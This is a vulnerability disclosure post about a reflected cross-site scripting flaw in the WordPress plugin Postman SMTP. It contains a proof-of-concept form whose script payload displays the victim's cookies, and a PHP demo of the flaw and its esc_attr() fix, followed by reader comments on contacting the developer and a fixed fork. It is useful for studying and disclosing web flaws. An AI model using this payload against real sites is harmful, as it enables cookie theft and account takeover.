Reflected Cross-Site Scripting (XSS) Vulnerability in Postman SMTP
We recently found that the plugin Postman SMTP contains a reflected cross-site scripting (XSS) vulnerability.
On line 346 of the file /Postman/Postman-Email-Log/PostmanEmailLogController.php, the value of the GET or POST input “page” is output without being escaped:
value="<?php echo $_REQUEST['page'] ?>" />
While the GET input “page” must be set to “postman_email_log” for that code to run, the POST input “page” can be set to a different value and, depending on the PHP configuration, will be the one output: PHP fills $_REQUEST from the sources listed in the request_order directive (falling back to variables_order when request_order is not set), with later sources overriding earlier ones, and in the usual “GP” and “EGPCS” settings POST comes after GET, so the POST value wins.
The website of the developer is down and we couldn’t find any other method to contact them directly. The plugin was last updated 16 months ago and is only listed as being compatible up to WordPress 4.4, so it doesn’t look like it is being maintained at this time.
Proof of Concept
The following proof of concept will cause any available cookies to be shown in an alert box. Major web browsers other than Firefox provided built-in XSS filtering when this was written, so the proof of concept would not fire in them; Chrome and Edge have since removed those filters.
Make sure to replace “[path to WordPress]” with the location of WordPress.
<html>
<body>
<form action="http://[path to WordPress]/wp-admin/tools.php?page=postman_email_log" method="POST">
<input type="hidden" name="page" value='"><script>alert(document.cookie);</script>' />
<input type="submit" value="Submit" />
</form>
</body>
</html>
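The following is an added example, not code from the plugin or from this post's author. It models how the “page” value that reaches the echo on line 346 is chosen (GET satisfies the routing check while POST supplies the payload, because PHP registers $_REQUEST sources in request_order/variables_order order with later sources overriding earlier ones) and prints the unescaped output next to the same line escaped with esc_attr(), the WordPress attribute-escaping function. The request arrays are constructed inline; the esc_attr() stand-in, effective_request_value(), render_vulnerable() and render_fixed() are names assumed here for the demonstration and exist only in this script. It runs stand-alone with the php CLI and needs no WordPress install.

```php
<?php
// Added example (not the plugin's code). Run with: php postman_xss_demo.php

// Outside WordPress esc_attr() does not exist. This stand-in approximates it
// with htmlspecialchars(); inside WordPress the real esc_attr() is used instead.
if (!function_exists('esc_attr')) {
    function esc_attr(string $text): string
    {
        return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    }
}

// Mirror how PHP populates $_REQUEST: sources are registered left to right in
// the order given by request_order (or variables_order when request_order is
// empty), and a later source overwrites an earlier one. Only G, P and C ever
// reach $_REQUEST; E and S in variables_order are ignored, as PHP does.
// With the usual "GP" / "EGPCS" settings, POST therefore overrides GET.
function effective_request_value(string $name, array $get, array $post, array $cookie, string $order): ?string
{
    $bags  = ['G' => $get, 'P' => $post, 'C' => $cookie];
    $value = null;
    foreach (str_split(strtoupper($order)) as $source) {
        if (isset($bags[$source]) && array_key_exists($name, $bags[$source])) {
            $value = (string) $bags[$source][$name];
        }
    }
    return $value;
}

// Same shape as the original line 346: the value is echoed unescaped.
function render_vulnerable(string $page): string
{
    return '<input type="hidden" name="page" value="' . $page . '" />';
}

// Hardened form: escape at the point of output, in the attribute context.
function render_fixed(string $page): string
{
    return '<input type="hidden" name="page" value="' . esc_attr($page) . '" />';
}

// Constructed request, matching the proof of concept above: the GET "page"
// satisfies the routing check, the POST "page" carries the payload.
$get    = ['page' => 'postman_email_log'];
$post   = ['page' => '"><script>alert(document.cookie);</script>'];
$cookie = [];

// Read the order the running PHP would actually use.
$order = ini_get('request_order') ?: ini_get('variables_order');
if ($order === false) {
    $order = '';
}
$page = effective_request_value('page', $get, $post, $cookie, $order);

echo "order used for \$_REQUEST: " . ($order === '' ? '(empty)' : $order) . "\n";
echo "routing check on GET passes: " . var_export($get['page'] === 'postman_email_log', true) . "\n";
echo "value that reaches the echo: " . var_export($page, true) . "\n\n";
echo "vulnerable: " . render_vulnerable((string) $page) . "\n";
echo "fixed:      " . render_fixed((string) $page) . "\n";
```

In the fixed output the double quote in the payload becomes `&quot;`, so the value can no longer close the attribute and the script tag is rendered as text. Two points worth keeping in mind when applying this to the plugin: the routing is decided by the GET parameter, so reading `$_GET['page']` rather than `$_REQUEST['page']` removes the POST override path, but escaping at output with esc_attr() is still required; and sanitising on input (for example with FILTER_SANITIZE_STRING, which is deprecated as of PHP 8.1) is not a substitute for escaping in the attribute context where the value is written.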
Hi,
Thank you for disclosing this vulnerability. This morning I was able to contact “Postman SMTP” developer, Jason Hendriks –although it was not an easy task ;)–. He was not aware of the fact his plugin had recently been removed from the official WordPress plugins directory. He said he would take a look.
One more thing, would this be a good fix?
value=”” />
(credits to @jasonpomerleau)
PS: I can see the code I provided within code tags looks messed up; I was making a reference to this solution https://wordpress.org/support/topic/postman-smtp-maileremail-log-is-prone-to-a-cross-site-scripting-vulnerability/#post-9555322
The recommended WordPress escaping function for where the value is being output in this situation is esc_attr().
Did you guys try to reach the author of Postman SMTP via Linkedin? https://ca.linkedin.com/in/jason-hendriks-66b36b33
No, we didn’t see any link to that in anything related to the plugin.
Yes that’s how I reached him the other day.
They removed a 100,000-copy plugin just for this? Are we sure that this is the solution?
Thanks
Someone named Yehuda Hassine has uploaded a fixed version in GitHub (https://github.com/yehudah/Postman-SMTP).
I can see he has modified the following files:
• /Postman-Auth/PostmanGoogleAuthenticationManager.php
• /Postman-Auth/PostmanMicrosoftAuthenticationManager.php
• /Postman-Auth/PostmanYahooAuthenticationManager.php
• /Postman-Email-Log/PostmanEmailLogController.php
• /Postman-Email-Log/PostmanEmailLogService.php
• /PostmanAjaxController.php
• /PostmanUtils.php
He has used FILTER_SANITIZE_STRING and intval.
BIG NEWS!
The fork (fixed version of “Postman SMTP Mailer/Email Log”) by Yehuda Hassine (props to him!) has been approved in the WordPress Directory. Fortunately, in the end, “Postman SMTP Mailer/Email Log” is going to survive, under the name of “Post SMTP Mailer/Email Log”. You can find it at https://wordpress.org/plugins/post-smtp/.
The Github repo has been moved here: https://github.com/yehudah/Post-SMTP.
Long live Post SMTP Mailer/Email Log!
Thank you @yehudah!